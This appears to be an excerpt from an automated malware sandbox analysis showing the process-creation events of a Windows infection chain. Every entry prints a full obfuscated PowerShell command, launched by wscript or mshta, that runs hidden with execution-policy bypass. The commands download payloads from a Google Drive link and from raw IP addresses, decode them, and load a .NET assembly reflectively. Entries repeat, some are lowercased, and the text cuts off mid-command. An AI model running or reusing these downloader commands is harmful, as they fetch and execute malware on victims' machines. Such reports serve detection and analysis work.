          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, 